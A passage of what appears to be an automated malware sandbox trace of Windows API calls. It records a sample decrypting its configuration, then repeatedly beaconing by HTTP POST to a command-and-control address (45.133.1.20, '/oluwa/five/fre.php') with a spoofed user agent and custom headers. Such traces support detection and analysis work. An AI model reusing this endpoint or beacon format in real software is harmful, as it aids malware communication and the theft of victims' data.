HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0157.219] GetProcessHeap () returned 0x6a0000 [0157.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bc3b8 [0157.219] GetProcessHeap () returned 0x6a0000 [0157.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0157.219] GetProcessHeap () returned 0x6a0000 [0157.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0157.219] GetProcessHeap () returned 0x6a0000 [0157.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0157.220] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0157.221] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0157.221] GetProcessHeap () returned 0x6a0000 [0157.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bc478 [0157.221] GetProcessHeap () returned 0x6a0000 [0157.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0157.222] send (s=0x278, buf=0x6bc478*, len=242, flags=0) returned 242 [0157.222] send (s=0x278, buf=0x6bb998*, len=159, flags=0) returned 159 [0157.222] GetProcessHeap () returned 0x6a0000 [0157.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b5c98 [0157.222] recv (in: s=0x278, buf=0x6b5c98, len=4048, flags=0 | out: buf=0x6b5c98*) returned 204 [0157.329] GetProcessHeap () returned 0x6a0000 [0157.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc478 | out: hHeap=0x6a0000) returned 1 [0157.330] GetProcessHeap () returned 0x6a0000 [0157.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0157.331] GetProcessHeap () returned 0x6a0000 [0157.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc3b8 | out: hHeap=0x6a0000) returned 1 [0157.331] GetProcessHeap () returned 0x6a0000 [0157.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0157.332] closesocket (s=0x278) returned 0 [0157.333] GetProcessHeap () returned 0x6a0000 [0157.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0157.333] GetProcessHeap () returned 0x6a0000 [0157.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0157.334] GetProcessHeap () returned 0x6a0000 [0157.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0157.335] GetProcessHeap () returned 0x6a0000 [0157.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0157.335] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b5c98, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x424) returned 0x278 [0157.342] Sleep (dwMilliseconds=0xea60) [0157.382] GetProcessHeap () returned 0x6a0000 [0157.382] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0157.386] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.386] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0157.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.401] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0157.419] GetProcessHeap () returned 0x6a0000 [0157.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0157.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.421] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0157.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.423] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0157.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.424] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0157.424] GetProcessHeap () returned 0x6a0000 [0157.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0157.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.426] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0157.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.427] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0157.428] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.429] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0157.429] GetProcessHeap () returned 0x6a0000 [0157.429] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0157.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.430] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0157.431] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.432] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0157.432] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.433] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0157.435] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.435] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0157.435] GetProcessHeap () returned 0x6a0000 [0157.435] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0157.435] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0157.435] GetProcessHeap () returned 0x6a0000 [0157.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0157.436] GetProcessHeap () returned 0x6a0000 [0157.436] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0157.436] GetProcessHeap () returned 0x6a0000 [0157.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0157.437] GetProcessHeap () returned 0x6a0000 [0157.437] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0157.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.438] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0157.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.447] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0157.456] GetProcessHeap () returned 0x6a0000 [0157.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0157.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.458] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0157.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.461] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0157.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.462] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0157.462] GetProcessHeap () returned 0x6a0000 [0157.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0157.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.464] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0157.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.465] CryptDestroyKey (hKey=0x6ad560) returned 1 [0157.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.467] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0157.467] GetProcessHeap () returned 0x6a0000 [0157.467] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0157.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.468] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0157.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.469] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0157.470] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.471] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0157.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.472] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0157.472] GetProcessHeap () returned 0x6a0000 [0157.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0157.472] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3698*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0157.472] GetProcessHeap () returned 0x6a0000 [0157.472] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0157.472] socket (af=2, type=1, protocol=6) returned 0x27c [0157.473] connect (s=0x27c, name=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0157.503] FreeAddrInfoW (pAddrInfo=0x6b3698*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be880*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0157.508] GetProcessHeap () returned 0x6a0000 [0157.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0157.508] GetProcessHeap () returned 0x6a0000 [0157.508] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0157.509] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0157.510] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0157.510] GetProcessHeap () returned 0x6a0000 [0157.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bc3b8 [0157.510] GetProcessHeap () returned 0x6a0000 [0157.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0157.511] GetProcessHeap () returned 0x6a0000 [0157.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0157.511] GetProcessHeap () returned 0x6a0000 [0157.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0157.512] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0157.513] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0157.513] GetProcessHeap () returned 0x6a0000 [0157.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bc478 [0157.513] GetProcessHeap () returned 0x6a0000 [0157.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0157.513] send (s=0x27c, buf=0x6bc478*, len=242, flags=0) returned 242 [0157.514] send (s=0x27c, buf=0x6bb998*, len=159, flags=0) returned 159 [0157.514] GetProcessHeap () returned 0x6a0000 [0157.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b5c98 [0157.514] recv (in: s=0x27c, buf=0x6b5c98, len=4048, flags=0 | out: buf=0x6b5c98*) returned 204 [0157.589] GetProcessHeap () returned 0x6a0000 [0157.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc478 | out: hHeap=0x6a0000) returned 1 [0157.590] GetProcessHeap () returned 0x6a0000 [0157.590] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0157.590] GetProcessHeap () returned 0x6a0000 [0157.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc3b8 | out: hHeap=0x6a0000) returned 1 [0157.591] GetProcessHeap () returned 0x6a0000 [0157.591] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0157.591] closesocket (s=0x27c) returned 0 [0157.592] GetProcessHeap () returned 0x6a0000 [0157.592] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0157.592] GetProcessHeap () returned 0x6a0000 [0157.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0157.593] GetProcessHeap () returned 0x6a0000 [0157.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0157.593] GetProcessHeap () returned 0x6a0000 [0157.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0157.594] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b5c98, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8b4) returned 0x27c [0157.595] Sleep (dwMilliseconds=0xea60) [0157.598] GetProcessHeap () returned 0x6a0000 [0157.598] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0157.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.600] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0157.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.610] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0157.617] GetProcessHeap () returned 0x6a0000 [0157.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0157.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.689] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0157.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.693] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0157.693] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.694] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0157.694] GetProcessHeap () returned 0x6a0000 [0157.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0157.695] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.696] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0157.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.698] CryptDestroyKey (hKey=0x6ad520) returned 1 [0157.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.708] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0157.708] GetProcessHeap () returned 0x6a0000 [0157.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0157.709] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.709] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0157.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.710] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0157.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.715] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0157.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.716] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0157.717] GetProcessHeap () returned 0x6a0000 [0157.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0157.717] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0157.717] GetProcessHeap () returned 0x6a0000 [0157.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0157.718] GetProcessHeap () returned 0x6a0000 [0157.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0157.719] GetProcessHeap () returned 0x6a0000 [0157.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0157.720] GetProcessHeap () returned 0x6a0000 [0157.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0157.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.721] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0157.743] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.746] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0157.870] GetProcessHeap () returned 0x6a0000 [0157.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0157.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.871] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0157.872] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.872] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0157.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.873] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0157.873] GetProcessHeap () returned 0x6a0000 [0157.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0157.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.875] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0157.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.876] CryptDestroyKey (hKey=0x6ad020) returned 1 [0157.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0157.880] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0157.880] GetProcessHeap () returned 0x6a0000 [0157.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0157.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.881] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0157.882] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.884] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0157.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.885] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0157.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.887] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0157.887] GetProcessHeap () returned 0x6a0000 [0157.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0157.887] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b6c20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0157.887] GetProcessHeap () returned 0x6a0000 [0157.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaf0 [0157.887] socket (af=2, type=1, protocol=6) returned 0x280 [0157.887] connect (s=0x280, name=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0157.946] FreeAddrInfoW (pAddrInfo=0x6b6c20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea30*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0157.946] GetProcessHeap () returned 0x6a0000 [0157.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0157.946] GetProcessHeap () returned 0x6a0000 [0157.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0157.947] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0157.948] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0157.948] GetProcessHeap () returned 0x6a0000 [0157.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6de0 [0157.948] GetProcessHeap () returned 0x6a0000 [0157.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0157.949] GetProcessHeap () returned 0x6a0000 [0157.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0157.949] GetProcessHeap () returned 0x6a0000 [0157.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0157.950] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0157.951] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: 